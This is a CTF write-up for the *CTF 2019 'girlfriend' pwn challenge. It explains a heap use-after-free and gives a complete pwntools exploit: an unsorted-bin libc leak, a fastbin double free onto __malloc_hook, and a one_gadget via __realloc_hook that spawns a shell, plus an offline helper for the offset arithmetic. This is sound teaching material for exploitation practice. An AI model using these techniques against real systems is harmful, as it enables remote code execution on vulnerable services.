Starctf_2019_girlfriend

<h1>Analysis</h1>
<p><img src="https://pic.imgdb.cn/item/63ad9faf08b683016307daba.png" alt="" /></p>
<p>The only vulnerability is a use-after-free on the name chunk: the free path (option 4, wrapped as <code>call()</code> in the exploit below) releases the name chunk but leaves the pointer in the girlfriend struct, so show (option 2) still dereferences it. The only place the program takes user input, however, is inside add.</p>
<p><img src="https://pic.imgdb.cn/item/63ad9ff608b6830163089618.png" alt="" /></p>
<p>The layout is easy to recover: each girlfriend is a 0x18-byte chunk. The first 8 bytes hold the pointer to the name chunk, the next 4 bytes hold the name's size, and the last 0xC bytes hold the call string. Since the name size is not restricted, we can allocate a name of unsorted-bin size (0x90 here, a 0xa0 chunk), free it, and read the dangling pointer to leak its <code>fd</code>, which points at the unsorted-bin head at <code>main_arena+0x58</code>; on glibc 2.23 x86-64 <code>__malloc_hook</code> sits 0x10 below <code>main_arena</code>, hence the <code>-0x68</code> in the exploit. A fastbin double free then gives a write at <code>__malloc_hook-0x23</code> (the byte 0x7f found there passes the fastbin size check for the 0x70 bin). Because the one_gadget constraints may not hold when it is entered straight from <code>__malloc_hook</code>, the hook is pointed at <code>__libc_realloc+2</code> and the one_gadget is placed in <code>__realloc_hook</code>; entering realloc a couple of bytes in skips part of its prologue and shifts the stack so the gadget's condition is met.</p>
<h1>Exploit</h1>
<pre><code>from pwn import *
# context.log_level = 'debug'
# o = process('./pwn')
o = remote('node4.buuoj.cn', '27825')
libc = ELF('./libc-2.23.so')

def add(size, name, call):
    # option 1: malloc(0x18) for the struct, malloc(size) for the name
    o.sendlineafter('Input your choice:', '1')
    o.sendlineafter("Please input the size of girl's name", str(size))
    o.sendlineafter('please inpute her name:', name)
    o.sendlineafter('please input her call:', call)

def show(index):
    # option 2: prints the name through the (possibly dangling) pointer
    o.sendlineafter('Input your choice:', '2')
    o.sendlineafter('Please input the index:', str(index))

def call(index):
    # option 4: frees the name chunk, pointer is left in the struct (UAF)
    o.sendlineafter('Input your choice:', '4')
    o.sendlineafter('Please input the index:', str(index))

add(0x90, 'aaaa', '11111')  # 0: 0xa0 chunk, goes to the unsorted bin when freed
add(0x60, 'bbbb', '22222')  # 1: 0x70 chunk, keeps chunk 0 away from the top chunk
call(0)
show(0)
o.recvuntil('name:\n')
# fd of the freed unsorted chunk = &amp;main_arena.bins[0] = __malloc_hook + 0x68
malloc_hook = u64(o.recv(6).ljust(8, b'\x00')) - 0x68
log.info(hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info('libc_base: ' + hex(libc_base))
libc_realloc = libc_base + libc.sym['__libc_realloc']
one = libc_base + 0xf1147

add(0x70, 'cccc', '123')    # 2
add(0x60, 'cccc', '33333')  # 3: second 0x70 chunk for the double free
call(1)
call(3)
call(1)                     # fastbin 0x70: 1 -> 3 -> 1
add(0x60, p64(malloc_hook - 0x23), '123')  # reuses chunk 1, fd -> fake chunk near __malloc_hook
add(0x60, 'aaaa', '123')                   # chunk 3
add(0x60, 'aaaa', '123')                   # chunk 1 again, fake chunk is now head of the bin
# fake chunk user data starts at __malloc_hook-0x13: 11 bytes of padding reach __realloc_hook,
# one_gadget goes into __realloc_hook, __libc_realloc+2 into __malloc_hook
add(0x60, b'a' * 11 + p64(one) + p64(libc_realloc + 2), '123')
o.sendlineafter('Input your choice:', '1')  # next malloc() -> __malloc_hook -> realloc+2 -> __realloc_hook -> one_gadget
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63ada0e208b68301630b0a2f.png" alt="" /></p>
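<p>As an added example (not part of the original writeup), the following Python reproduces offline the arithmetic the exploit depends on for glibc 2.23 on x86-64: why a fake chunk at <code>__malloc_hook-0x23</code> passes the fastbin size check for a <code>malloc(0x60)</code>, how the <code>-0x68</code> leak offset is derived, and how the 11-byte padding lands one_gadget in <code>__realloc_hook</code> and <code>__libc_realloc+2</code> in <code>__malloc_hook</code>. The memory snapshot around the hooks is constructed to mirror the well-known 2.23 layout (its pointer values are placeholders), and the <code>one_gadget</code> and <code>__libc_realloc</code> values used in the demo are placeholders, not taken from the challenge libc. The scan is general: pass any request size to look for fake chunks in other fastbins.</p>

```python
import struct

# Added example, not code from the original writeup. Constants follow glibc 2.23
# malloc.c on x86-64 (SIZE_SZ = 8).
SIZE_SZ = 8
MIN_CHUNK_SIZE = 4 * SIZE_SZ
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1
SIZE_BITS = 0x7                    # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
MALLOC_HOOK_TO_MAIN_ARENA = 0x10   # main_arena starts 0x10 after __malloc_hook
UNSORTED_BIN_OFF = 0x58            # &main_arena.bins[0] - &main_arena


def p64(v):
    return struct.pack('<Q', v)


def u64(b):
    return struct.unpack('<Q', b)[0]


def malloc_hook_from_unsorted_leak(fd):
    """fd of a lone chunk in the unsorted bin points at &main_arena.bins[0]."""
    return fd - (MALLOC_HOOK_TO_MAIN_ARENA + UNSORTED_BIN_OFF)   # i.e. fd - 0x68


def request2size(req):
    """malloc() request -> chunk size, as glibc's request2size macro."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MIN_CHUNK_SIZE:
        return MIN_CHUNK_SIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def chunksize(size_field):
    return size_field & ~SIZE_BITS


def fastbin_index(sz):
    return (sz >> 4) - 2


def find_fake_fast(image, image_off, req):
    """Offsets (relative to __malloc_hook) at which a fake chunk header survives
    the 2.23 check in _int_malloc:
        fastbin_index(chunksize(victim)) != idx -> "malloc(): memory corruption (fast)"
    `image` is a byte snapshot starting `image_off` bytes before __malloc_hook."""
    idx = fastbin_index(request2size(req))
    hits = []
    for i in range(len(image) - 2 * SIZE_SZ + 1):
        size_field = u64(image[i + SIZE_SZ:i + 2 * SIZE_SZ])
        if fastbin_index(chunksize(size_field)) == idx:
            hits.append(image_off + i)
    return hits


# Constructed snapshot of the 0x40 bytes before __malloc_hook, shaped like a 2.23
# libc after its first malloc: a stray 0x00007f.. pointer at -0x20, then
# __memalign_hook (-0x10) and __realloc_hook (-0x8) still holding their *_hook_ini
# addresses. The pointer values are placeholders; only the 0x7f byte positions matter.
IMAGE_OFF = -0x40
LIBC_IMAGE = (
    p64(0) * 4 +
    p64(0x00007ffff7dd0260) +      # -0x20: libc pointer, its 0x7f byte sits at -0x1b
    p64(0) +                       # -0x18
    p64(0x00007ffff7a92e20) +      # -0x10: __memalign_hook
    p64(0x00007ffff7a92a00)        # -0x08: __realloc_hook
)


def build_hook_payload(fake_chunk_off, one_gadget, libc_realloc):
    """Bytes the final add() writes into the fake chunk: padding from the chunk's
    user data up to __realloc_hook, then one_gadget (-> __realloc_hook) and
    __libc_realloc+2 (-> __malloc_hook). Returns the payload and a map of
    landing offset (relative to __malloc_hook) -> value written."""
    user_off = fake_chunk_off + 2 * SIZE_SZ     # skip prev_size and size fields
    pad = -SIZE_SZ - user_off                   # __realloc_hook == __malloc_hook - 8
    payload = b'a' * pad + p64(one_gadget) + p64(libc_realloc + 2)
    landing = {user_off + pad: one_gadget, user_off + pad + SIZE_SZ: libc_realloc + 2}
    return payload, landing


if __name__ == '__main__':
    req = 0x60
    print('malloc(%#x) -> chunk %#x, fastbin index %d'
          % (req, request2size(req), fastbin_index(request2size(req))))
    hits = find_fake_fast(LIBC_IMAGE, IMAGE_OFF, req)
    print('fake chunk candidates relative to __malloc_hook:', [hex(h) for h in hits])
    # placeholder gadget/realloc offsets (libc base 0), not the challenge libc's
    payload, landing = build_hook_payload(hits[0], one_gadget=0xf1147, libc_realloc=0x84000)
    print('payload length %d, writes: %s'
          % (len(payload), {hex(k): hex(v) for k, v in landing.items()}))
```

<p>The scan is the same idea as pwndbg's <code>find_fake_fast</code>: the 0x7f byte of a 0x00007f.. pointer, read misaligned, yields a size field of 0x7f, which <code>chunksize()</code> masks to 0x78, the same fastbin index as the 0x70 chunk a <code>malloc(0x60)</code> asks for. The payload is 27 bytes, well inside the 0x60 the name buffer accepts.</p>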
